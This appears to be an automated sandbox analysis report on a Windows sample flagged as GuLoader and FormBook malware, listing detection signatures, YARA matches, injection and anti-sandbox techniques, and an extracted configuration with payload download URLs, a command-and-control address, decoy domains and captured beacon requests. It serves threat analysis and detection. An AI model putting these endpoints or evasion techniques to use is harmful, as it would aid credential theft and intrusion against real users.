Windows Analysis Report F63V4i8eZU.exe

Overview

General Information

Sample Name: F63V4i8eZU.exe
Analysis ID: 450884
MD5: 08730cdd286a4c9d46b38bb6545ac311
SHA1: 001bb7b5b8d63e505661d7e4a178d08abe6bbad7
SHA256: cb2a2537987e45c8461d40a0ec6c24215920519257134db91dd1369ff5abf342
Tags: 32exe
Infos:

Most interesting Screenshot:

Detection

GuLoader FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
GuLoader behavior detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Potentially malicious time measurement code found
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: F63V4i8eZU.exe Malware Configuration Extractor: GuLoader {"Payload URL": "https://kinmirai.org/wp-content/bin_QVwo"}
Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.yellow-wink.com/nff/"], "decoy": ["shinseikai.site", "creditmystartup.com", "howtovvbucks.com", "betterfromthebeginning.com", "oubacm.com", "stonalogov.com", "gentrypartyof8.com", "cuesticksandsupplies.com", "joelsavestheday.com", "llanobnb.com", "ecclogic.com", "miempaque.com", "cai23668.com", "miscdr.net", "twzhhq.com", "bloomandbrewcafe.com", "angcomleisure.com", "mafeeboutique.com", "300coin.club", "brooksranchhomes.com", "konversiondigital.com", "dominivision.com", "superiorshinedetailing.net", "thehomechef.global", "dating-web.site", "gcbsclubc.com", "mothererph.com", "pacleanfuel.com", "jerseryshorenflflagfootball.com", "roberthyatt.com", "wwwmacsports.com", "tearor.com", "american-ai.com", "mkyiyuan.com", "gempharmatechllc.com", "verdijvtc.com", "zimnik-bibo.one", "heatherdarkauthor.net", "dunn-labs.com", "automotivevita.com", "bersatubagaidulu.com", "gorillarecruiting.com", "mikecdmusic.com", "femuveewedre.com", "onyxmodsllc.com", "ooweesports.com", "dezeren.com", "foeweifgoor73dz.com", "sorchaashe.com", "jamiitulivu.com", "jifengshijie.com", "ranchfiberglas.com", "glendalesocialmediaagency.com", "icuvietnam.com", "404hapgood.com", "planetturmeric.com", "danfrem.com", "amazonautomationbusiness.com", "switchfinder.com", "diversifiedforest.com", "findnehomes.com", "rsyueda.com", "colombianmatrimony.com", "evan-dawson.info"]}
Multi AV Scanner detection for submitted file
Source: F63V4i8eZU.exe Virustotal: Detection: 10% Perma Link
Yara detected FormBook
Source: Yara match File source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY

Compliance:

barindex
Uses 32bit PE files
Source: F63V4i8eZU.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 133.130.104.18:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: Binary string: chkdsk.pdbGCTL source: F63V4i8eZU.exe, 00000012.00000002.475302278.00000000000D0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000001D.00000000.448678814.0000000009B40000.00000002.00000001.sdmp
Source: Binary string: chkdsk.pdb source: F63V4i8eZU.exe, 00000012.00000002.475302278.00000000000D0000.00000040.00000001.sdmp
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ISOL.pdb source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe
Source: Binary string: wntdll.pdbUGP source: F63V4i8eZU.exe, 00000012.00000002.480375309.000000001E390000.00000040.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1285968735.0000000005440000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: F63V4i8eZU.exe, chkdsk.exe
Source: Binary string: wscui.pdb source: explorer.exe, 0000001D.00000000.448678814.0000000009B40000.00000002.00000001.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 4x nop then pop edi 31_2_00C2E442

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.yellow-wink.com/nff/
Source: Malware configuration extractor URLs: https://kinmirai.org/wp-content/bin_QVwo
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /nff/?D48p=kOxlMsEjtzqi35JKXOQvqY0Z9Dr8MJKVGpcl7uHZUSc/duxdP9tVlajaQyGMVspbd71z&-ZgX=tR-DSFa8o HTTP/1.1Host: www.oubacm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=1Xxx+qd8pBTLA+WTXKo7XaXaUaa/vtHv40sNd0BzbA6K7Qnc9Dw7+srX/AipaLaYNVgg HTTP/1.1Host: www.mothererph.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=t6POCtyEK9WeI3wHMDqVXFf1P6NZVFBUQrx3hzUMeWhQO7zB8dJJWUZafBhAs6NE8fvj HTTP/1.1Host: www.howtovvbucks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?D48p=A3r1GoCxq8luIa6nCE3Ske6N+BTFMgq1N1qJ/FMsH45BCQO39yS3uoKBERul6QoZrrZt&-ZgX=tR-DSFa8o HTTP/1.1Host: www.mikecdmusic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=hj2zxdGwTxg/Oy5I2ijyN0fTICzPxcwPRfXb7vTf2tNSz2x0IcDR494UQaPw8xmFi6Rl HTTP/1.1Host: www.pacleanfuel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?D48p=yLp+OGFnl0jg7pOzvTf//aMS5CTocG0VRGMnH1GHhYzZCkZUh0GgSDI2xq5DNsTFnZjT&-ZgX=tR-DSFa8o HTTP/1.1Host: www.foeweifgoor73dz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=27rvRn0KmepyxD8tf0kCiU4ghUW26GTZLquNc10L5JocjkBpiI2ubcvHzFDqc++aW5sB HTTP/1.1Host: www.thehomechef.globalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?D48p=BYCicstSjiimYQeLhOM2IfVFUU5xkRxUW/ddRKXtK0U5B2C8EeMnAtCjd12GxjTXIZnB&-ZgX=tR-DSFa8o HTTP/1.1Host: www.yellow-wink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=CcVDHNb77dcNdWY2oqs0Q3cJ+rSEYLRnUCyMOMN+TEyN4HUBsnEuVHzuIckGNGmzeXmd HTTP/1.1Host: www.amazonautomationbusiness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=cRGxEbCxtxOklbCQDq2naIaOwJUFKZbTk/bYH1mjDoD5ciZshsmVa8jbK15SYwAvUHmE HTTP/1.1Host: www.ooweesports.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?D48p=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8Ikvp/Bi1Hxc&-ZgX=tR-DSFa8o HTTP/1.1Host: www.gentrypartyof8.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=23vdk0INmHdYoMyjDJpAXxw5aErMVqufSgZPm4X7AcKozm0yVvV2ivtCtqAjwFsJpdV9 HTTP/1.1Host: www.dunn-labs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?D48p=4F7AytNRxG9Okht4XRBjCmtmhOo761MGK9UHRz2K68ko8sG2VRn93GfHKNzVTrlp6vls&-ZgX=tR-DSFa8o HTTP/1.1Host: www.tearor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.50.252.64 198.50.252.64
Source: Joe Sandbox View IP Address: 212.32.237.90 212.32.237.90
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: OVHFR OVHFR
Source: Joe Sandbox View ASN Name: GOOGLE-2US GOOGLE-2US
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET /nff/?D48p=kOxlMsEjtzqi35JKXOQvqY0Z9Dr8MJKVGpcl7uHZUSc/duxdP9tVlajaQyGMVspbd71z&-ZgX=tR-DSFa8o HTTP/1.1Host: www.oubacm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=1Xxx+qd8pBTLA+WTXKo7XaXaUaa/vtHv40sNd0BzbA6K7Qnc9Dw7+srX/AipaLaYNVgg HTTP/1.1Host: www.mothererph.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=t6POCtyEK9WeI3wHMDqVXFf1P6NZVFBUQrx3hzUMeWhQO7zB8dJJWUZafBhAs6NE8fvj HTTP/1.1Host: www.howtovvbucks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?D48p=A3r1GoCxq8luIa6nCE3Ske6N+BTFMgq1N1qJ/FMsH45BCQO39yS3uoKBERul6QoZrrZt&-ZgX=tR-DSFa8o HTTP/1.1Host: www.mikecdmusic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=hj2zxdGwTxg/Oy5I2ijyN0fTICzPxcwPRfXb7vTf2tNSz2x0IcDR494UQaPw8xmFi6Rl HTTP/1.1Host: www.pacleanfuel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?D48p=yLp+OGFnl0jg7pOzvTf//aMS5CTocG0VRGMnH1GHhYzZCkZUh0GgSDI2xq5DNsTFnZjT&-ZgX=tR-DSFa8o HTTP/1.1Host: www.foeweifgoor73dz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=27rvRn0KmepyxD8tf0kCiU4ghUW26GTZLquNc10L5JocjkBpiI2ubcvHzFDqc++aW5sB HTTP/1.1Host: www.thehomechef.globalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?D48p=BYCicstSjiimYQeLhOM2IfVFUU5xkRxUW/ddRKXtK0U5B2C8EeMnAtCjd12GxjTXIZnB&-ZgX=tR-DSFa8o HTTP/1.1Host: www.yellow-wink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=CcVDHNb77dcNdWY2oqs0Q3cJ+rSEYLRnUCyMOMN+TEyN4HUBsnEuVHzuIckGNGmzeXmd HTTP/1.1Host: www.amazonautomationbusiness.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=cRGxEbCxtxOklbCQDq2naIaOwJUFKZbTk/bYH1mjDoD5ciZshsmVa8jbK15SYwAvUHmE HTTP/1.1Host: www.ooweesports.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?D48p=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8Ikvp/Bi1Hxc&-ZgX=tR-DSFa8o HTTP/1.1Host: www.gentrypartyof8.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?-ZgX=tR-DSFa8o&D48p=23vdk0INmHdYoMyjDJpAXxw5aErMVqufSgZPm4X7AcKozm0yVvV2ivtCtqAjwFsJpdV9 HTTP/1.1Host: www.dunn-labs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /nff/?D48p=4F7AytNRxG9Okht4XRBjCmtmhOo761MGK9UHRz2K68ko8sG2VRn93GfHKNzVTrlp6vls&-ZgX=tR-DSFa8o HTTP/1.1Host: www.tearor.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmp String found in binary or memory: <a href="https://www.facebook.com/InstraCorp" target="_blank" rel="nofollow"><i class="fa fa-facebook"></i></a> equals www.facebook.com (Facebook)
Source: unknown DNS traffic detected: queries for: kinmirai.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 19 Jul 2021 18:23:41 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: explorer.exe, 0000001D.00000000.448268826.00000000089F9000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmp String found in binary or memory: http://farmersschool.ge/bin_QVwEr224.bin
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe String found in binary or memory: http://ocsp.digicert.com0O
Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmp String found in binary or memory: http://survey-smiles.com
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000001D.00000000.448303771.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Lato:300
Source: F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmp String found in binary or memory: https://kinmirai.org/wp-content/bin_QVwEr224.bin
Source: F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmp String found in binary or memory: https://kinmirai.org/wp-content/bin_QVwEr224.binhttp://farmersschool.ge/bin_QVwEr224.binwininet.dllM
Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/instra
Source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe String found in binary or memory: https://www.digicert.com/CPS0
Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmp String found in binary or memory: https://www.instra.com/?utm_medium=free_parking&utm_source=thehomechef.global
Source: chkdsk.exe, 0000001F.00000002.1287294288.0000000005E5F000.00000004.00000001.sdmp String found in binary or memory: https://www.instra.com/en/hosting/web-hosting-packages/?utm_medium=free_parking&utm_source=thehomech
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown HTTPS traffic detected: 133.130.104.18:443 -> 192.168.2.3:49746 version: TLS 1.2

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 0000001F.00000002.1285459135.0000000004FC5000.00000004.00000020.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.1287054375.000000000596F000.00000004.00000001.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process Stats: CPU usage > 98%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5852 NtWriteVirtualMemory,LoadLibraryA, 0_2_022A5852
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A88E2 NtProtectVirtualMemory, 0_2_022A88E2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A08DC NtWriteVirtualMemory,TerminateProcess, 0_2_022A08DC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A045E EnumWindows,NtWriteVirtualMemory, 0_2_022A045E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A8DB4 NtWriteVirtualMemory,CreateProcessInternalW, 0_2_022A8DB4
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A55EC NtAllocateVirtualMemory, 0_2_022A55EC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A423F NtWriteVirtualMemory, 0_2_022A423F
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4263 NtWriteVirtualMemory, 0_2_022A4263
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4277 NtWriteVirtualMemory, 0_2_022A4277
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5A46 NtWriteVirtualMemory,LoadLibraryA, 0_2_022A5A46
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A33A7 NtWriteVirtualMemory, 0_2_022A33A7
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A48E8 NtWriteVirtualMemory, 0_2_022A48E8
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A28E2 NtWriteVirtualMemory,LoadLibraryA, 0_2_022A28E2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4128 NtWriteVirtualMemory, 0_2_022A4128
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A513E NtWriteVirtualMemory, 0_2_022A513E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A46E4 NtWriteVirtualMemory, 0_2_022A46E4
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5724 NtAllocateVirtualMemory, 0_2_022A5724
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A1FD9 NtWriteVirtualMemory, 0_2_022A1FD9
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4C2B NtWriteVirtualMemory, 0_2_022A4C2B
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4C21 NtWriteVirtualMemory, 0_2_022A4C21
